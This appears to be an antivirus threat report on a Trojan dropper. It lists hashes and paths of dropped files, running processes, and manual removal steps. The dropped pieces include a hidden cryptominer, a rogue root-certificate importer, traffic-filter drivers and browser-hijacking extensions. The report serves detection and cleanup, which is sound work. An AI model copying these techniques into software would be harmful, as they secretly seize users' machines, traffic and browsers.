c5e3b60827475c15298f27df5aa241db | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1] |
4a55c7ba203a42c5f6014fa68c221b02 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\240714_ps[1].exe |
28f4a2d3d12718e2be4df161203da4ad | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\291014_nj[1].exe |
02cb66123e29291d26ec629ae644e0b3 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_cp[1].exe |
fddf4c9d5bdf47f6638a1405cab91044 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\310714_mb[1] |
1b99adddd28023e61c2a23c13cd855cf | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_a9[1].exe |
7b828bdd47d8ccfc1cc421befa0420ff | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_gs[1] |
86efd8c3d12bf831f3d2a7e29fe282aa | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\310714_is[1] |
d1b659d5e028009b62b337d5bbdf6787 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\cpuminer-x11opt-setup[1].exe |
348109d7b5f154f9722c63b53ed7a600 | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\310714_br[1].exe |
41be921214a9653b77b80086b4c5a7a5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe |
183ce47148c66717fbcd147a41a0caf6 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe |
a96619564071df84cc892752df062a6d | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe |
e7b4b146a101093e11ce45d203dd907b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe |
8a8f5ebe2fd9c2e6325723209b9cdf32 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe |
86efd8c3d12bf831f3d2a7e29fe282aa | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\310714_is.exe |
fddf4c9d5bdf47f6638a1405cab91044 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe |
1b99adddd28023e61c2a23c13cd855cf | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe |
d61776c4928db339475ab6a773585c9d | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe |
02cb66123e29291d26ec629ae644e0b3 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe |
4a55c7ba203a42c5f6014fa68c221b02 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe |
aff6e78398132094f1e26605275eb44a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe |
871bd80009fa0011b2de2ab0f9b82d6c | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE |
2db34c7d07707168429b0b2633ff75c0 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll |
c17103ae9072a06da581dec998343fc1 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\System.dll |
d7a3fa6a6c738b4a3c40d5602af20b08 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\inetc.dll |
84bcf3c71e70d5a6e9dc07d70466bdc3 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\registry.dll |
faa7f034b38e729a983965c04cc70fc1 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll |
84bcf3c71e70d5a6e9dc07d70466bdc3 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll |
2b7007ed0262ca02ef69d8990815cbeb | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssE6B8.tmp\registry.dll |
9163a02f8cf9071e609ee20b1a4868b2 | c:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe |
a5bfd6a87161d5dfa81cb5c2c6d29488 | c:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ProtectService.exe:3580
ProtectService.exe:3668
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
ProtectWindowsManager.exe:3736
ProtectWindowsManager.exe:3316
import_root_cert.exe:3188
15094FED_stp.EXE:3668
cpuminer-x11opt-setup.exe:3752
DesProtetor.exe:536
wpm_v20.0.0.2227.exe:3268
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
QQBrowser.exe:3824
QQBrowser.exe:3212
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
powershell.exe:3772
powershell.exe:3656
powershell.exe:3376
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
XTab_Setup2253.exe:1748
cmdshell.exe:3596
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
amisid.exe:3516
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
nfregdrv.exe:3588
nfregdrv.exe:3076
nfregdrv.exe:1648
nfregdrv.exe:3924
nfregdrv.exe:3192
HPNotify.exe:3640
CashReminder.exe:3984
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
ActSys.exe:148
certutil.exe:3280
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
amisetup2899__9664.exe:3368
GOSafer.exe:3264
WNet.exe:4016
310714_is.exe:948 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (876 bytes)
%Program Files% (x86)\XTab\CmdShell.exe (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)
%Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
%Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
%Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
%Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
%Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
%Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
%Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
C:\Windows\System32\cpuminer-conf.json (420 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)
%Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
%Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
%Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
%Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
%Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
